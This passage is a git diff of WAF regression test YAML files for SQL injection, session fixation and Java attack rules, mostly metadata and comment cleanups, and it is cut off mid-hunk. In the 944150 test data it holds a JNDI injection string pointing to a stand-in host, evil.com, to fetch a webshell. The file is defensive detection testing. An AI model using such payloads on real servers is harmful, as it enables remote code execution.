a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942360.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Buehler, azurit" - description: None +rule_id: 942360 tests: - test_id: 1 desc: "concatenated basic SQL injection and SQLLFI" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml index 10d10a19a..259cc79ba 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942361.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christoph Hansen, azurit" - description: None +rule_id: 942361 tests: - test_id: 1 desc: "Detects basic SQL injection based on keyword alter or union" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml index fdc1d7fc3..27c6d2d09 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942362.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, Christoph Hansen, Franziska Buehler, azurit" - description: None +rule_id: 942362 tests: - test_id: 1 desc: "concatenated basic SQL injection and SQLLFI" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml index 54279c427..18ba3f0fa 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942370.yaml @@ -6,7 +6,8 @@ meta: WARNING: these tests were derived from the existing expressions and are semantically meaningless. The tests were used to ensure that a change to the assembly file would not change the semantics. - If you know what a particular expression is supposed to catch, please revise the associated test.rule_id: 942370 + If you know what a particular expression is supposed to catch, please revise the associated test. +rule_id: 942370 tests: - test_id: 1 desc: | diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml index ee0cf1b02..c3445da07 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942380.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christoph Hansen, azurit" - description: None +rule_id: 942380 tests: - test_id: 1 desc: "SQL Injection Attack" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml index 503274696..05ce6b989 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None +rule_id: 942390 tests: - test_id: 1 desc: "SQL Injection Attack" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml index 46b912d71..2de63c416 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None +rule_id: 942400 tests: - test_id: 1 desc: "SQL Injection Attack" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml index 8398d2f7c..a3ee7e847 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christoph Hansen, azurit" - description: None +rule_id: 942410 tests: - test_id: 1 desc: "SQL Injection Attack" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml index 865399199..b0d3ee0e6 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None +rule_id: 942420 tests: - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (8)" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml index 22dc08ea6..4b71697ff 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None +rule_id: 942421 tests: - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (3)" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml index c0dd5a946..b8e732451 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None +rule_id: 942430 tests: - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml index fd9cea392..0254f2112 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None +rule_id: 942431 tests: - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml index b43434dea..0a34adce1 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, azurit" - description: None +rule_id: 942432 tests: - test_id: 1 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml index 7ce8e3c34..7af45734d 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christian S.J. Peron, Max Leske, azurit" - description: None +rule_id: 942440 tests: - test_id: 1 desc: "SQL Comment Sequence" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml index 6254021d0..bf0f304cd 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml @@ -1,7 +1,7 @@ --- meta: author: "William Woodson, azurit" - description: None +rule_id: 942450 tests: - test_id: 1 desc: "SQL Hex Encoding" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml index 49e020b98..9a2b72a23 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml @@ -1,7 +1,7 @@ --- meta: author: "Franziska Bühler, azurit" - description: None +rule_id: 942460 tests: - test_id: 1 desc: "Repetitive Non-Word Characters" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml index 72caff6e7..3496a13e4 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christoph Hansen, azurit" - description: None +rule_id: 942470 tests: - test_id: 1 desc: "SQL Injection Attack" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml index e12ca7023..cf93c29b3 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml @@ -1,7 +1,7 @@ --- meta: author: "Jose Nazario, azurit" - description: None +rule_id: 942480 tests: - test_id: 1 desc: "SQL Injection Attack" @@ -16,25 +16,11 @@ tests: method: GET port: 80 # variable name boundary attacks - uri: "/?'msdasql'" + uri: "/get?'msdasql'" version: HTTP/1.0 output: log: expect_ids: [942480] - - test_id: 2 - desc: "SQL Injection Attack" - stages: - - input: - dest_addr: "127.0.0.1" - headers: - Host: "localhost" - Cache-Control: "no-cache, no-store, must-revalidate" - # variable name boundary attacks - uri: "/get?'msdasql'" - version: HTTP/1.0 - output: - log: - expect_ids: [942480] - test_id: 2 desc: "SQL Injection Attack" stages: diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml index d91924c63..910071cd0 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml @@ -1,7 +1,7 @@ --- meta: author: "Christoph Hansen, azurit" - description: None +rule_id: 942490 tests: - test_id: 1 desc: "classic SQL injection probings 3/3" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml index f350dee55..622884924 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml @@ -1,7 +1,7 @@ --- meta: author: "Franziska Buehler, azurit" - description: None +rule_id: 942510 tests: - test_id: 1 desc: "SQLi bypass detected: backticks" diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml index 7dd1d827b..a2096ccbe 100644 --- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml +++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml @@ -1,7 +1,7 @@ --- meta: author: "Walter Hop, azurit" - description: None +rule_id: 942511 tests: - test_id: 1 desc: "SQLi bypass detected: quotes" diff --git a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml index 33658babd..56e504cef 100644 --- a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml +++ b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml @@ -1,7 +1,7 @@ --- meta: author: "csanders-git, azurit" - description: None +rule_id: 943100 tests: - test_id: 1 desc: Session Fixation Attack (943100) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml index cbd725d85..f0a02000d 100644 --- a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml +++ b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml @@ -1,7 +1,7 @@ --- meta: author: "csanders-git, azurit" - description: None +rule_id: 943110 tests: - test_id: 1 desc: Session Fixation Attack (943110) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml index e845e93de..33a874629 100644 --- a/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml +++ b/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml @@ -1,7 +1,7 @@ --- meta: author: "csanders-git, azurit" - description: None +rule_id: 943120 tests: - test_id: 1 desc: Session Fixation Attack (943120) from old modsec regressions diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml index 9eac2d2ed..b08f7b265 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944130.yaml @@ -1,7 +1,6 @@ --- meta: author: "spartantri, azurit" - description: "Positive tests for rule 944130" rule_id: 944130 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml index 56e884e21..a1f312d84 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944140.yaml @@ -1,7 +1,7 @@ --- meta: author: "lifeforms, azurit" - description: None +rule_id: 944140 tests: - test_id: 1 desc: Java script uploads diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml index 4f7e39fdd..47f48e5e1 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944150.yaml @@ -1,6 +1,6 @@ --- -# NOTE: Please keep these tests in sync with 944151.yaml. -# 944151 should detect the same things as 944150. +# NOTE: Please keep these tests in sync with 944151.yaml and 944152.yaml. +# 944150 should detect the same things as 944151 and 944152. meta: author: "dune73, Max Leske, azurit" rule_id: 944150 @@ -196,7 +196,7 @@ tests: method: POST port: 80 uri: "/post" - data: '{"foo": "${jndi:ldap://evil.com/webshell}"}' + data: '{"foo": "$\u007bjndi:ldap://evil.com/webshell}"}' version: "HTTP/1.1" output: log: diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml index 1c15911e4..f056faeac 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944151.yaml @@ -1,6 +1,6 @@ --- -# NOTE: Please keep these tests in sync with 944151.yaml. -# 944151 should detect the same things as 944151. +# NOTE: Please keep these tests in sync with 944150.yaml and 944152.yaml. +# 944151 should detect the same things as 944150 and 944152. meta: author: "dune73, Max Leske, azurit" rule_id: 944151 diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml index 4621656e8..f1509f20d 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944152.yaml @@ -1,6 +1,6 @@ --- -# NOTE: Please keep these tests in sync with 944152.yaml and 944151.yaml. -# 944152 should detect the same things as 944152 and 944151. +# NOTE: Please keep these tests in sync with 944150.yaml and 944151.yaml. +# 944152 should detect the same things as 944150 and 944151. meta: author: "dune73, Max Leske, azurit" rule_id: 944152 diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml index 40cee4887..8aa888914 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944210.yaml @@ -1,7 +1,6 @@ --- meta: author: "spartantri, azurit" - description: "Positive tests for rule 944210" rule_id: 944210 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml index 5b4807405..7d5a2ef38 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944240.yaml @@ -1,7 +1,6 @@ --- meta: author: "spartantri, azurit" - description: "Positive tests for rule 944240" rule_id: 944240 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml index 19789faf8..b9aa24729 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944250.yaml @@ -1,7 +1,6 @@ --- meta: author: "spartantri, azurit" - description: "Positive tests for rule 944250" rule_id: 944250 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml index bf411fe7c..d6a8d28e8 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944260.yaml @@ -1,7 +1,6 @@ --- meta: author: "theMiddle, azurit" - description: "Positive tests for rule 944260" rule_id: 944260 tests: - test_id: 1 diff --git a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml index dc8a22494..9ab732eb5 100644 --- a/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml +++ b/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944300.yaml @@ -1,7 +1,6 @@ --- meta: author: "spartantri, azurit" - description: "Positive tests for rule 944300" rule_id: 944300 tests: - test_id: 1 @@ -61,7 +60,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -82,7 +80,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -103,7 +100,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -284,7 +280,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -305,7 +300,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -326,7 +320,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -507,7 +500,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -528,7 +520,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -549,7 +540,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -730,7 +720,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -751,7 +740,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -772,7 +760,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -953,7 +940,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -974,7 +960,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -995,7 +980,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -1176,7 +1160,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -1197,7 +1180,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -1218,7 +1200,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -1399,7 +1380,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -1420,7 +1400,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -1441,7 +1420,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -1622,7 +1600,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -1643,7 +1620,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -1664,7 +1640,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -1845,7 +1820,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -1866,7 +1840,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -1887,7 +1860,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -2068,7 +2040,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -2089,7 +2060,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -2110,7 +2080,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -2291,7 +2260,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -2312,7 +2280,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -2333,7 +2300,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -2514,7 +2480,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -2535,7 +2500,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -2556,7 +2520,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -2737,7 +2700,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -2758,7 +2720,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -2779,7 +2740,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -2960,7 +2920,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -2981,7 +2940,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -3002,7 +2960,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -3183,7 +3140,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -3204,7 +3160,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -3225,7 +3180,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -3406,7 +3360,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -3427,7 +3380,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -3448,7 +3400,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -3629,7 +3580,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -3650,7 +3600,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -3671,7 +3620,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -3852,7 +3800,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -3873,7 +3820,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -3894,7 +3840,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -4075,7 +4020,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -4096,7 +4040,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -4117,7 +4060,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -4298,7 +4240,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -4319,7 +4260,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -4340,7 +4280,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -4521,7 +4460,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -4542,7 +4480,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -4563,7 +4500,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -4744,7 +4680,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -4765,7 +4700,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -4786,7 +4720,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -4967,7 +4900,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -4988,7 +4920,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -5009,7 +4940,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -5190,7 +5120,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: [944300] @@ -5211,7 +5140,6 @@ tests: method: "POST" uri: "/post" version: "HTTP/1.0" - data: "test=value" output: log: expect_ids: 